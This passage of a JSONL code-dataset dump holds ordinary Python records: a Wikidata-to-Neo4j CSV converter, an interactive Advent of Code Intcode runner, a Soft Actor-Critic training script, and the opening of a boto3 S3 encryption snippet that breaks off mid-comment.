+{"seq_id":"550329766","text":"import json\nimport codecs\n\ndef fix_string(s):\n return s.replace(',', '').replace('\"', '').replace('\\\\', '').replace('\\n', '')\n\ndef parse_time(time, precision):\n # input comes in like +2013-01-01T00:00:00Z\n state = 0\n year = ''\n month = ''\n day = ''\n for a in time:\n if state == 0:\n if a == '-':\n year += a\n state = 1\n elif state == 1: # reading the year\n if a == '-':\n state = 2\n else:\n year += a\n elif state == 2: # reading the month\n if a == '-':\n state = 3\n else:\n month += a\n elif state == 3: # reading the day\n if a == 'T':\n break\n else:\n day += a\n \n if int(month) == 0 or precision < 10:\n fix_month = ''\n else:\n fix_month = str(int(month))\n \n if int(day) == 0 or precision < 11:\n fix_day = ''\n else:\n fix_day = str(int(day))\n \n \n return year, fix_month, fix_day\n\ndef xstr(s):\n if s is None:\n return ''\n return str(s)\n\nlang_labels = []\nlang_descriptions = []\nlang_aliases = []\n\nfile_labels = open('./language-labels', 'r')\nfile_descriptions = open('./language-description', 'r')\nfile_aliases = open('./language-aliases', 'r')\n\nlang_labels = file_labels.read().splitlines()\nlang_descriptions = file_descriptions.read().splitlines()\nlang_aliases = file_aliases.read().splitlines()\n\nfile_labels.close()\nfile_descriptions.close()\nfile_aliases.close()\n\nentity_type = \"\"\nrelationship = \"\"\nitem_to = \"\"\nstring_value = \"\"\n\n# wikidata json\njson_file = codecs.open('../Downloads/wikidata.json', 'r', encoding='utf-8')\n\n# nodes\ncsv_entities = codecs.open('./entity.csv', 'w', encoding='utf-8')\ncsv_strings = codecs.open('./string.csv', 'w', encoding='utf-8')\ncsv_time = codecs.open('./time.csv', 'w', encoding='utf-8')\ncsv_quantity = codecs.open('./quantity.csv', 'w', encoding='utf-8')\ncsv_qualifiers = codecs.open('./qualifiers.csv', 'w', encoding='utf-8')\ncsv_url = codecs.open('./url.csv', 'w', encoding='utf-8')\ncsv_monolingual = codecs.open('./monolingual.csv', 'w', encoding='utf-8')\ncsv_commons = codecs.open('./commons.csv', 'w', encoding='utf-8')\ncsv_globe = codecs.open('./globe.csv', 'w', encoding='utf-8')\ncsv_claims = 
codecs.open('./claims.csv', 'w', encoding='utf-8')\ncsv_references = codecs.open('./references.csv', 'w', encoding='utf-8')\n\n# relationships\ncsv_relationships = codecs.open('./relationships.csv', 'w', encoding='utf-8')\n\ncsv_claims.write ('id:ID\\n')\ncsv_qualifiers.write ('id:ID\\n')\ncsv_references.write ('id:ID\\n')\ncsv_entities.write ('id:ID,:LABEL')\ncsv_commons.write ('id:ID,value\\n')\ncsv_url.write ('id:ID,value\\n')\ncsv_strings.write ('id:ID,value\\n')\ncsv_time.write ('id:ID,value,timezone,before,after,precision,year:long,month:int,day:int\\n')\ncsv_quantity.write ('id:ID,value,unit,upperBound,lowerBound\\n')\ncsv_globe.write ('id:ID,value,latitude,longitude,altitude,precision,globe\\n')\ncsv_monolingual.write ('id:ID,value,language\\n')\n\ncsv_relationships.write (':START_ID,:END_ID,:TYPE\\n')\n\n# writing the header for entities.csv\nfor l in lang_labels:\n csv_entities.write(',label_' + l)\nfor d in lang_descriptions:\n csv_entities.write(',description_' + d)\nfor a in lang_aliases:\n csv_entities.write(',alias_' + a + ':string[]')\ncsv_entities.write('\\n')\n\n# first line is a {\nline = json_file.readline()\nline_number = 1\n\n#initializing generated ids\nurl_generated_id = 0\nmono_generated_id = 0\ntime_generated_id = 0\nclaim_generated_id = 0\nglobe_generated_id = 0\nstring_generated_id = 0\ncommons_generated_id = 0\nquantity_generated_id = 0\nqualifier_generated_id = 0\nreference_generated_id = 0\n\n\nwhile True:\n line = json_file.readline()\n line_number += 1\n if not line:\n break\n\n # last line in json is different\n if line[-2] == ',':\n fixline = line[:-2]\n else:\n fixline = line[:-1]\n\n try:\n j = json.loads(fixline)\n except ValueError:\n print('invalid line in json file: ' + str(line_number) + '.')\n continue\n\n entity_id = j['id']\n entity_type = j['type']\n\n entity_labels = dict()\n entity_descriptions = dict()\n entity_aliases = dict()\n\n if 'labels' in j:\n labels = j['labels']\n for l in labels:\n lang = j['labels'][l]['language']\n if 'value' in j['labels'][l]:\n value = j['labels'][l]['value']\n entity_labels.update( {lang: value} )\n else:\n print('line:' + str(line_number) + ', entity id:' + entity_id + ', label: language without value.\\n')\n \n if 'descriptions' in j:\n descriptions = j['descriptions']\n for d in descriptions:\n lang = j['descriptions'][d]['language']\n if 'value' in j['descriptions'][d]:\n value = j['descriptions'][d]['value']\n entity_descriptions.update( {lang: value} )\n else:\n print('line:' + str(line_number) + ', entity id:' + entity_id + ', description: language without value.\\n')\n \n if 'aliases' in j:\n aliases = j['aliases']\n for alias in aliases:\n lang = j['aliases'][alias][0]['language']\n a_array = j['aliases'][alias]\n value_array = []\n for a in a_array:\n value_array.append(a['value'])\n entity_aliases.update( {lang: value_array} )\n\n # write the item/property in entities.csv\n if entity_type == 'item':\n csv_entities.write(entity_id + ',Item;Entity')\n elif entity_type == 'property':\n csv_entities.write(entity_id + ',Property;Entity')\n else:\n print('Entity is neither Item nor Property, line:' + str(line_number))\n\n for l in lang_labels:\n if l in entity_labels:\n csv_entities.write(',\"' + fix_string(entity_labels[l]) + '\"')\n else:\n csv_entities.write(',')\n \n for d in lang_descriptions:\n if d in entity_descriptions:\n csv_entities.write(',\"' + fix_string(entity_descriptions[d]) + '\"')\n else:\n csv_entities.write(',')\n\n for alias in lang_aliases:\n if alias in entity_aliases:\n a_array = 
entity_aliases[alias]\n csv_entities.write(',')\n first = True\n for a in a_array:\n if first:\n csv_entities.write( fix_string(a) )\n first = False\n else:\n csv_entities.write(';' + fix_string(a) )\n else:\n csv_entities.write(',')\n csv_entities.write('\\n')\n\n if 'claims' in j:\n claims = j['claims']\n for c in claims:\n relationship = c\n p = j['claims'][c]\n for p2 in p:\n claim_generated_id += 1\n claim = 'CL' + str(claim_generated_id)\n if 'qualifiers' in p2:\n qualifiers = p2['qualifiers']\n for c in qualifiers:\n q = qualifiers[c]\n for q2 in q:\n qualifier_generated_id += 1\n csv_qualifiers.write('C'+str(qualifier_generated_id)+'\\n')\n csv_relationships.write(claim + ',C' + str(qualifier_generated_id) + ',QUAL_FROM\\n')\n csv_relationships.write('C' + str(qualifier_generated_id) + ',' + c + ',PROPERTY\\n')\n\n datatype = q2['datatype']\n\n if datatype == 'wikibase-item':\n if 'datavalue' not in q2:\n continue\n item = q2['datavalue']['value']['numeric-id']\n item = \"Q\" + str(item)\n csv_relationships.write('C'+str(qualifier_generated_id) + ',' + item + \",QUAL_TO\\n\")\n\n elif datatype == 'time':\n if 'datavalue' not in q2:\n continue\n time = q2['datavalue']['value']['time']\n timezone = str(q2['datavalue']['value']['timezone'])\n before = str(q2['datavalue']['value']['before'])\n after = str(q2['datavalue']['value']['after'])\n precision = str(q2['datavalue']['value']['precision'])\n year, month, day = parse_time(time, int(precision))\n csv_time.write('T'+str(time_generated_id) +','+time+','+timezone+','+before+','+after+','+precision+','+year+','+month+','+day+'\\n')\n csv_relationships.write('C'+str(qualifier_generated_id) + ',T' + str(time_generated_id) + \",QUAL_TO\\n\")\n time_generated_id += 1\n\n elif datatype == 'string':\n if 'datavalue' not in q2:\n continue\n string_value = q2['datavalue']['value']\n csv_strings.write('S'+str(string_generated_id) + ','+ fix_string(string_value) + '\\n')\n csv_relationships.write('C'+str(qualifier_generated_id) + ',S' + str(string_generated_id) + \",QUAL_TO\\n\")\n string_generated_id += 1\n\n elif datatype == 'quantity':\n if 'datavalue' not in q2:\n continue\n amount = q2['datavalue']['value']['amount']\n unit = q2['datavalue']['value']['unit']\n upperBound = q2['datavalue']['value']['upperBound']\n lowerBound = q2['datavalue']['value']['lowerBound']\n csv_quantity.write('QT'+str(quantity_generated_id)+','+amount+','+unit+','+upperBound+','+lowerBound+'\\n')\n csv_relationships.write('C'+str(qualifier_generated_id) + \",QT\" + str(quantity_generated_id) + ',QUAL_TO\\n')\n quantity_generated_id += 1\n\n elif datatype == 'url':\n if 'datavalue' not in q2:\n continue\n url_value = fix_string(q2['datavalue']['value'])\n csv_url.write('U' + str(url_generated_id) + ',' + url_value + '\\n')\n csv_relationships.write('C'+str(qualifier_generated_id) + \",U\" + str(url_generated_id) + ',QUAL_TO\\n')\n url_generated_id += 1\n\n elif datatype == 'monolingualtext':\n if 'datavalue' not in q2:\n continue\n mono_text = fix_string(q2['datavalue']['value']['text'])\n mono_lang = q2['datavalue']['value']['language']\n csv_monolingual.write('MT'+ str(mono_generated_id) + ',' + mono_text + ',' + mono_lang + '\\n')\n csv_relationships.write('C'+str(qualifier_generated_id) + \",MT\" + str(mono_generated_id) + ',QUAL_TO\\n')\n mono_generated_id += 1\n\n elif datatype == 'commonsMedia':\n if 'datavalue' not in q2:\n continue\n commons_value = fix_string(q2['datavalue']['value'])\n csv_commons.write('CM' + str(commons_generated_id) + ',' + 
commons_value + '\\n')\n csv_relationships.write('C'+str(qualifier_generated_id) + \",CM\" + str(commons_generated_id) + ',QUAL_TO\\n')\n commons_generated_id += 1\n\n elif datatype == 'globe-coordinate':\n if 'datavalue' not in q2:\n continue\n latitude = xstr(q2['datavalue']['value']['latitude'])\n longitude = xstr(q2['datavalue']['value']['longitude'])\n altitude = xstr(q2['datavalue']['value']['altitude'])\n precision = xstr(q2['datavalue']['value']['precision'])\n globe = xstr(q2['datavalue']['value']['globe'])\n globe_value = 'lat:' + latitude + ' lon:' + longitude\n csv_globe.write('GC'+str(globe_generated_id)+','+globe_value+','+latitude+','+longitude+','+altitude+','+precision+','+globe+'\\n')\n csv_relationships.write('C'+str(qualifier_generated_id) + \",GC\" + str(globe_generated_id) + ',QUAL_TO\\n')\n globe_generated_id += 1\n\n if 'references' in p2:\n references_list = p2['references']\n for reference in references_list:\n snaks = reference['snaks']\n for prop_snak in snaks:\n prop_snak_list = snaks[prop_snak]\n for snak in prop_snak_list:\n reference_generated_id += 1\n csv_references.write('R'+str(reference_generated_id)+'\\n')\n csv_relationships.write(claim + ',R' + str(reference_generated_id) + ',REF_FROM\\n')\n csv_relationships.write('R' + str(reference_generated_id) + ',' + prop_snak + ',PROPERTY\\n')\n datatype = snak['datatype']\n \n if datatype == 'wikibase-item':\n if 'datavalue' not in snak:\n continue\n item = \"Q\" + str(snak['datavalue']['value']['numeric-id'])\n csv_relationships.write('R'+str(reference_generated_id) + ',' + item + \",REF_TO\\n\")\n\n elif datatype == 'string':\n if 'datavalue' not in snak:\n continue\n string_value = snak['datavalue']['value']\n csv_strings.write('S'+str(string_generated_id) + ','+ fix_string(string_value) + '\\n')\n csv_relationships.write('R'+str(reference_generated_id) + ',S' + str(string_generated_id) + \",REF_TO\\n\")\n string_generated_id += 1\n\n elif datatype == 'time':\n if 'datavalue' not in snak:\n continue\n time = snak['datavalue']['value']['time']\n timezone = str(snak['datavalue']['value']['timezone'])\n before = str(snak['datavalue']['value']['before'])\n after = str(snak['datavalue']['value']['after'])\n precision = str(snak['datavalue']['value']['precision'])\n year, month, day = parse_time(time, int(precision))\n csv_time.write('T'+str(time_generated_id) +','+time+','+timezone+','+before+','+after+','+precision+','+year+','+month+','+day+'\\n')\n csv_relationships.write('R'+str(reference_generated_id) + ',T' + str(time_generated_id) + \",REF_TO\\n\")\n time_generated_id += 1\n\n elif datatype == 'quantity':\n if 'datavalue' not in snak:\n continue\n amount = snak['datavalue']['value']['amount']\n unit = snak['datavalue']['value']['unit']\n upperBound = snak['datavalue']['value']['upperBound']\n lowerBound = snak['datavalue']['value']['lowerBound']\n csv_quantity.write('QT'+str(quantity_generated_id)+','+amount+','+unit+','+upperBound+','+lowerBound+'\\n')\n csv_relationships.write('R'+str(reference_generated_id) + \",QT\" + str(quantity_generated_id) + ',REF_TO\\n')\n quantity_generated_id += 1\n\n elif datatype == 'url':\n if 'datavalue' not in snak:\n continue\n url_value = fix_string(snak['datavalue']['value'])\n csv_url.write('U' + str(url_generated_id) + ',' + url_value + '\\n')\n csv_relationships.write('R'+str(reference_generated_id) + \",U\" + str(url_generated_id) + ',REF_TO\\n')\n url_generated_id += 1\n\n elif datatype == 'monolingualtext':\n if 'datavalue' not in snak:\n continue\n mono_text = 
fix_string(snak['datavalue']['value']['text'])\n mono_lang = snak['datavalue']['value']['language']\n csv_monolingual.write('MT'+ str(mono_generated_id) + ',' + mono_text + ',' + mono_lang + '\\n')\n csv_relationships.write('R'+str(reference_generated_id) + \",MT\" + str(mono_generated_id) + ',REF_TO\\n')\n mono_generated_id += 1\n\n elif datatype == 'commonsMedia':\n if 'datavalue' not in snak:\n continue\n commons_value = fix_string(snak['datavalue']['value'])\n csv_commons.write('CM' + str(commons_generated_id) + ',' + commons_value + '\\n')\n csv_relationships.write('R'+str(reference_generated_id) + \",CM\" + str(commons_generated_id) + ',REF_TO\\n')\n commons_generated_id += 1\n\n elif datatype == 'globe-coordinate':\n if 'datavalue' not in snak:\n continue\n latitude = xstr(snak['datavalue']['value']['latitude'])\n longitude = xstr(snak['datavalue']['value']['longitude'])\n altitude = xstr(snak['datavalue']['value']['altitude'])\n precision = xstr(snak['datavalue']['value']['precision'])\n globe = xstr(snak['datavalue']['value']['globe'])\n globe_value = 'lat:' + latitude + ' lon:' + longitude\n csv_globe.write('GC'+str(globe_generated_id)+','+globe_value+','+latitude+','+longitude+','+altitude+','+precision+','+globe+'\\n')\n csv_relationships.write('R'+str(reference_generated_id) + \",GC\" + str(globe_generated_id) + ',REF_TO\\n')\n globe_generated_id += 1\n\n if 'datatype' in p2['mainsnak']:\n datatype = p2['mainsnak']['datatype']\n csv_claims.write(claim + '\\n')\n csv_relationships.write(claim + \",\" + relationship + ',PROPERTY\\n')\n csv_relationships.write(entity_id + \",\" + claim + \",PROP_FROM\\n\")\n \n if datatype == 'wikibase-item':\n if 'datavalue' not in p2['mainsnak']:\n continue\n item = p2['mainsnak']['datavalue']['value']['numeric-id']\n item = \"Q\" + str(item)\n csv_relationships.write(claim + \",\" + item + \",PROP_TO\\n\")\n\n elif datatype == 'wikibase-property':\n if 'datavalue' not in p2['mainsnak']:\n continue\n prop = p2['mainsnak']['datavalue']['value']['numeric-id']\n prop = \"P\" + str(prop)\n csv_relationships.write(claim + \",\" + prop + \",PROP_TO\\n\")\n \n elif datatype == 'string':\n if 'datavalue' not in p2['mainsnak']:\n continue\n string_id = p2['id']\n string_value = p2['mainsnak']['datavalue']['value']\n csv_strings.write(string_id + ','+ fix_string(string_value) + '\\n')\n csv_relationships.write(claim + \",\" + string_id + ',PROP_TO\\n')\n\n elif datatype == 'time':\n if 'datavalue' not in p2['mainsnak']:\n continue\n time_id = p2['id']\n time = p2['mainsnak']['datavalue']['value']['time']\n timezone = str(p2['mainsnak']['datavalue']['value']['timezone'])\n before = str(p2['mainsnak']['datavalue']['value']['before'])\n after = str(p2['mainsnak']['datavalue']['value']['after'])\n precision = str(p2['mainsnak']['datavalue']['value']['precision'])\n year, month, day = parse_time(time, int(precision))\n csv_time.write(time_id +','+time+','+timezone+','+before+','+after+','+precision+','+year+','+month+','+day+'\\n')\n csv_relationships.write(claim + \",\" + time_id + ',PROP_TO\\n')\n\n elif datatype == 'quantity':\n if 'datavalue' not in p2['mainsnak']:\n continue\n quantity_id = p2['id']\n amount = p2['mainsnak']['datavalue']['value']['amount']\n unit = p2['mainsnak']['datavalue']['value']['unit']\n upperBound = p2['mainsnak']['datavalue']['value']['upperBound']\n lowerBound = p2['mainsnak']['datavalue']['value']['lowerBound']\n csv_quantity.write(quantity_id + ','+ amount + ',' + unit + ',' + upperBound + ',' + lowerBound + '\\n')\n 
csv_relationships.write(claim + \",\" + quantity_id + ',PROP_TO\\n')\n \n elif datatype == 'url':\n if 'datavalue' not in p2['mainsnak']:\n continue\n url_value = fix_string(p2['mainsnak']['datavalue']['value'])\n csv_url.write('U' + str(url_generated_id) + ',' + url_value + '\\n')\n csv_relationships.write(claim + \",U\" + str(url_generated_id) + ',PROP_TO\\n')\n url_generated_id += 1\n\n elif datatype == 'monolingualtext':\n if 'datavalue' not in p2['mainsnak']:\n continue\n mono_text = fix_string(p2['mainsnak']['datavalue']['value']['text'])\n mono_lang = p2['mainsnak']['datavalue']['value']['language']\n csv_monolingual.write('MT'+ str(mono_generated_id) + ',' + mono_text + ',' + mono_lang + '\\n')\n csv_relationships.write(claim + \",MT\" + str(mono_generated_id) + ',PROP_TO\\n')\n mono_generated_id += 1\n\n elif datatype == 'commonsMedia':\n if 'datavalue' not in p2['mainsnak']:\n continue\n commons_value = fix_string(p2['mainsnak']['datavalue']['value'])\n csv_commons.write('CM' + str(commons_generated_id) + ',' + commons_value + '\\n')\n csv_relationships.write(claim + \",CM\" + str(commons_generated_id) + ',PROP_TO\\n')\n commons_generated_id += 1\n \n elif datatype == 'globe-coordinate':\n if 'datavalue' not in p2['mainsnak']:\n continue\n latitude = xstr(p2['mainsnak']['datavalue']['value']['latitude'])\n longitude = xstr(p2['mainsnak']['datavalue']['value']['longitude'])\n altitude = xstr(p2['mainsnak']['datavalue']['value']['altitude'])\n precision = xstr(p2['mainsnak']['datavalue']['value']['precision'])\n globe = xstr(p2['mainsnak']['datavalue']['value']['globe'])\n globe_value = 'lat:' + latitude + ' lon:' + longitude\n csv_globe.write('GC'+str(globe_generated_id)+','+globe_value+','+latitude+','+longitude+','+altitude+','+precision+','+globe+'\\n')\n csv_relationships.write(claim + \",GC\" + str(globe_generated_id) + ',PROP_TO\\n')\n globe_generated_id += 1\n\n\n# close all open files\ncsv_url.close()\ncsv_time.close()\ncsv_globe.close()\njson_file.close()\ncsv_claims.close()\ncsv_commons.close() \ncsv_strings.close()\ncsv_quantity.close()\ncsv_entities.close()\ncsv_qualifiers.close()\ncsv_references.close()\ncsv_monolingual.close()\ncsv_relationships.close()\n","sub_path":"engine-neo4j/generate_csv/parser.py","file_name":"parser.py","file_ext":"py","file_size_in_byte":26279,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"134387141","text":"#!/usr/bin/env python3\nfrom sys import argv\nfrom collections import defaultdict\nfrom Intcode import Intcode\n\n# read in the program\nfilename = argv[1]\nwith open(filename) as f:\n pgm = defaultdict(int, {i:int(x) for i,x in enumerate(f.readline().rstrip().split(\",\"))})\n\nvc = Intcode(pgm, 0)\ns = ''\nwhile True:\n result = vc.run()\n s += chr(result)\n if s.endswith('Command?\\n') or len(s) > 1000 or vc.halted:\n cmd = input(s)\n cmd += '\\n'\n s = ''\n vc.input = [ord(c) for c in cmd]\n vc.input_ptr = 0\n\n# Items needed in inventory to get past checkpoint:\n# Items in your inventory:\n# - hologram\n# - space law space brochure\n# - mutex\n# - manifold\n","sub_path":"day25/cryostatis.py","file_name":"cryostatis.py","file_ext":"py","file_size_in_byte":686,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"73573744","text":"\"\"\"\nPyTorch code for SAC. 
Copied and modified from PyTorch code for SAC-NF (Mazoure et al., 2019): https://arxiv.org/abs/1905.06893\n\"\"\"\n\nimport os\nimport sys\nimport argparse\nimport time\nimport datetime\nimport itertools\nimport random\nimport pickle\nimport glob\n\nimport gym\nimport numpy as np\nimport torch\nfrom sac_gs import SAC\nfrom normalized_actions import NormalizedActions\nfrom replay_memory import ReplayMemory\nimport pandas as pd\ntry:\n import pybulletgym\nexcept:\n print('No PyBullet Gym. Skipping...')\nfrom utils import logging, get_time, print_args\nfrom utils import save_checkpoint, load_checkpoint\n\nfrom tensorboardX import SummaryWriter\n\n\nparser = argparse.ArgumentParser(description='PyTorch code for SAC-NF (Mazoure et al., 2019,https://arxiv.org/abs/1905.06893)')\nparser.add_argument('--env-name', default=\"Ant-v2\",\n help='name of the environment to run')\nparser.add_argument('--eval', type=bool, default=True,\n help='Evaluates a policy every 10 episodes (default: True)')\nparser.add_argument('--gamma', type=float, default=0.99, metavar='G',\n help='discount factor for reward (default: 0.99)')\nparser.add_argument('--tau', type=float, default=0.005, metavar='G',\n help='target smoothing coefficient(tau) (default: 0.005)')\nparser.add_argument('--lr', type=float, default=0.0003, metavar='G',\n help='learning rate (default: 0.0003)')\nparser.add_argument('--num_layers', type=int, default=1,\n help='number of layers (default: 1)')\nparser.add_argument('--actor_lr', type=float, default=0.0003, metavar='G',\n help='learning rate (default: 0.0003)')\nparser.add_argument('--alpha', type=float, default=0.05, metavar='G',\n help='Temperature parameter alpha determines the relative importance of the entropy term against the reward (default: 0.05)')\nparser.add_argument('--automatic_entropy_tuning', type=bool, default=False, metavar='G',\n help='Temperature parameter alpha automatically adjusted.')\n#parser.add_argument('--seed', type=int, default=456, metavar='N',\n# help='random seed (default: 456)')\nparser.add_argument('--batch_size', type=int, default=256, metavar='N',\n help='batch size (default: 256)')\nparser.add_argument('--num_steps', type=int, default=3000001, metavar='N',\n help='maximum number of steps (default: 3000001)')\nparser.add_argument('--hidden_size', type=int, default=256, metavar='N',\n help='hidden size (default: 256)')\nparser.add_argument('--updates_per_step', type=int, default=1, metavar='N',\n help='model updates per simulator step (default: 1)')\nparser.add_argument('--start_steps', type=int, default=10000, metavar='N',\n help='Steps sampling random actions (default: 10000)')\nparser.add_argument('--target_update_interval', type=int, default=1, metavar='N',\n help='Value target update per no. 
of updates per step (default: 1)')\nparser.add_argument('--hadamard',type=int,default=1)\nparser.add_argument('--replay_size', type=int, default=1000000, metavar='N',\n help='size of replay buffer (default: 10000000)')\nparser.add_argument('--cuda', action=\"store_true\",\n help='run on CUDA (default: False)')\nparser.add_argument('--cache', default='experiments', type=str)\nparser.add_argument('--experiment', default=None, help='name of experiment')\nparser.add_argument('--nb_evals', type=int, default=10,\n help='nb of evaluations')\nparser.add_argument('--resume', dest='resume', action='store_true', default=True,\n help='flag to resume the experiments')\nparser.add_argument('--no-resume', dest='resume', action='store_false', default=True,\n help='flag to resume the experiments')\nparser.add_argument('--exp-num', type=int, default=0,\n help='experiment number')\n\n# seed\nparser.add_argument('--seed', type=int, default=456, metavar='N',\n help='random seed (default: 456)')\n\n# log\nparser.add_argument('--log-interval', type=int, default=1000,\n help='log print-out interval (step)')\nparser.add_argument('--eval-interval', type=int, default=10000,\n help='eval interval (step)')\nparser.add_argument('--ckpt-interval', type=int, default=5000,\n help='checkpoint interval (step)')\n\nargs = parser.parse_args()\nargs.hadamard = bool(args.hadamard)\n\n# set env\nif args.env_name == 'Humanoidrllab':\n from rllab.envs.mujoco.humanoid_env import HumanoidEnv\n from rllab.envs.normalized_env import normalize\n env = normalize(HumanoidEnv())\n max_episode_steps = float('inf')\n if args.seed >= 0:\n global seed_\n seed_ = args.seed\nelse:\n env = gym.make(args.env_name)\n max_episode_steps=env._max_episode_steps\n env=NormalizedActions(env)\n if args.seed >= 0:\n env.seed(args.seed)\nif args.seed >= 0:\n torch.manual_seed(args.seed)\n np.random.seed(args.seed)\n random.seed(args.seed)\n torch.random.manual_seed(args.seed)\n if torch.cuda.is_available():\n torch.cuda.manual_seed(args.seed)\n torch.backends.cudnn.deterministic = True\n torch.backends.cudnn.benchmark = False\n\n# set args\nargs.num_actions = env.action_space.shape[0]\nargs.max_action = env.action_space.high\nargs.min_action = env.action_space.low\n\n# set cache folder\nif args.cache is None:\n args.cache = 'experiments'\nif args.experiment is None:\n args.experiment = '-'.join(['sac',\n 'mnh{}'.format(args.num_layers),\n 'sstep{}'.format(args.start_steps),\n 'a{}'.format(args.alpha),\n 'mlr{}'.format(args.lr),\n 'seed{}'.format(args.seed),\n 'exp{}'.format(args.exp_num),\n ])\nargs.path = os.path.join(args.cache, args.experiment)\nif args.resume:\n listing = glob.glob(args.path+'-19*') + glob.glob(args.path+'-20*')\n if len(listing) == 0:\n args.path = '{}-{}'.format(args.path, get_time())\n else:\n path_sorted = sorted(listing, key=lambda x: datetime.datetime.strptime(x, args.path+'-%y%m%d-%H:%M:%S'))\n args.path = path_sorted[-1]\n pass\nelse:\n args.path = '{}-{}'.format(args.path, get_time())\nos.system('mkdir -p {}'.format(args.path))\n\n# print args\nlogging(str(args), path=args.path)\n\n# init tensorboard\nwriter = SummaryWriter(args.path)\n\n# print config\nconfiguration_setup='SAC'\nconfiguration_setup+='\\n'\nconfiguration_setup+=print_args(args)\n#for arg in vars(args):\n# configuration_setup+=' {} : {}'.format(str(arg),str(getattr(args, arg)))\n# configuration_setup+='\\n'\nlogging(configuration_setup, path=args.path)\n\n# init sac\nagent = SAC(env.observation_space.shape[0], env.action_space, 
args)\nlogging(\"----------------------------------------\", path=args.path)\nlogging(str(agent.critic), path=args.path)\nlogging(\"----------------------------------------\", path=args.path)\nlogging(str(agent.policy), path=args.path)\nlogging(\"----------------------------------------\", path=args.path)\n\n# memory\nmemory = ReplayMemory(args.replay_size)\n\n# resume\nargs.start_episode = 1\nargs.offset_time = 0 # elapsed\nargs.total_numsteps = 0\nargs.updates = 0\nargs.eval_steps = 0\nargs.ckpt_steps = 0\nagent.load_model(args)\nmemory.load(os.path.join(args.path, 'replay_memory'), 'pkl')\n\n# Training Loop\ntotal_numsteps = args.total_numsteps # 0\nupdates = args.updates # 0\neval_steps = args.eval_steps # 0\nckpt_steps = args.ckpt_steps # 0\nstart_episode = args.start_episode # 1\noffset_time = args.offset_time # 0\nstart_time = time.time()\nif 'dataframe' in args:\n df = args.dataframe\nelse:\n df = pd.DataFrame(columns=[\"total_steps\", \"score_eval\", \"time_so_far\"])\n\nfor i_episode in itertools.count(start_episode):\n episode_reward = 0\n episode_steps = 0\n done = False\n state = env.reset()\n\n while not done:\n if args.start_steps > total_numsteps:\n action = np.random.uniform(env.action_space.low,env.action_space.high,env.action_space.shape[0]) # Sample random action\n else:\n action = agent.select_action(state) # Sample action from policy\n if len(memory) > args.start_steps:\n # Number of updates per step in environment\n for i in range(args.updates_per_step):\n # Update parameters of all the networks\n (critic_1_loss, critic_2_loss,\n policy_loss,\n _, _,\n policy_info,\n )= agent.update_parameters(memory, args.batch_size, updates)\n updates += 1\n\n # log\n if updates % args.log_interval == 0:\n logging(\"Episode: {}\"\n \", update: {}\"\n \", critic_1 loss: {:.3f}\"\n \", critic_2 loss: {:.3f}\"\n .format(\n i_episode,\n updates,\n critic_1_loss,\n critic_2_loss,\n ), path=args.path)\n\n writer.add_scalar('train/critic_1/loss/update', critic_1_loss, updates)\n writer.add_scalar('train/critic_2/loss/update', critic_2_loss, updates)\n else:\n pass\n\n next_state, reward, done, _ = env.step(action) # Step\n episode_steps += 1\n total_numsteps += 1\n eval_steps += 1\n ckpt_steps += 1\n episode_reward += reward\n\n # Ignore the \"done\" signal if it comes from hitting the time horizon.\n # (https://github.com/openai/spinningup/blob/master/spinup/algos/sac/sac.py)\n mask = 1 if episode_steps == max_episode_steps else float(not done)\n\n memory.push(state, action, reward, next_state, mask) # Append transition to memory\n\n state = next_state\n\n elapsed = round((time.time() - start_time + offset_time),2)\n logging(\"Episode: {}\"\n \", time (sec): {}\"\n \", total numsteps: {}\"\n \", episode steps: {}\"\n \", reward: {}\"\n .format(\n i_episode,\n elapsed,\n total_numsteps,\n episode_steps,\n round(episode_reward, 2),\n ), path=args.path)\n writer.add_scalar('train/ep_reward/episode', episode_reward, i_episode)\n writer.add_scalar('train/ep_reward/step', episode_reward, total_numsteps)\n\n # evaluation\n if eval_steps>=args.eval_interval or total_numsteps > args.num_steps:\n logging('evaluation time', path=args.path)\n r=[]\n for _ in range(args.nb_evals):\n state = env.reset()\n episode_reward = 0\n done = False\n while not done:\n action = agent.select_action(state, eval=True)\n\n next_state, reward, done, _ = env.step(action)\n episode_reward += reward\n\n state = next_state\n r.append(episode_reward)\n mean_reward=np.mean(r)\n\n # add to data frame\n res = 
{\"total_steps\": total_numsteps,\n \"score_eval\": mean_reward,\n \"time_so_far\": round((time.time() - start_time),2)}\n df = df.append(res, ignore_index=True)\n\n # add to log\n logging(\"----------------------------------------\", path=args.path)\n logging(\"Test Episode: {}, mean reward: {}, ep reward: {}\"\n .format(\n i_episode, round(mean_reward, 2), round(episode_reward, 2),\n ), path=args.path)\n logging(\"----------------------------------------\", path=args.path)\n writer.add_scalar('test/ep_reward/mean/step', mean_reward, total_numsteps)\n writer.add_scalar('test/ep_reward/episode/step', episode_reward, total_numsteps)\n\n # writer\n writer.flush()\n\n # reset count\n eval_steps%=args.eval_interval\n\n if ckpt_steps>=args.ckpt_interval and args.ckpt_interval > 0:\n training_info = {\n 'start_episode': i_episode+1,\n 'offset_time': round((time.time() - start_time + offset_time),2),\n 'total_numsteps': total_numsteps,\n 'updates': updates,\n 'eval_steps': eval_steps,\n 'ckpt_steps': ckpt_steps,\n 'dataframe': df,\n }\n agent.save_model(training_info)\n memory.save(os.path.join(args.path, 'replay_memory'), 'pkl')\n ckpt_steps%=args.ckpt_interval\n\n if total_numsteps > args.num_steps:\n break\n\nenv.close()\n","sub_path":"main_gs.py","file_name":"main_gs.py","file_ext":"py","file_size_in_byte":12770,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"264501256","text":"import boto3\nimport pprint\nfrom botocore.exceptions import ClientError\n\n#\n# setting up configured profile on your machine.\n# You can ignore this step if you want use default AWS CLI profile.\n#\nboto3.setup_default_session(profile_name='admin-analyticshut')\n\ns3 = boto3.client('s3')\n# Setting up encryption to bucket. There are two possible algorithms 1. AES256 2. 
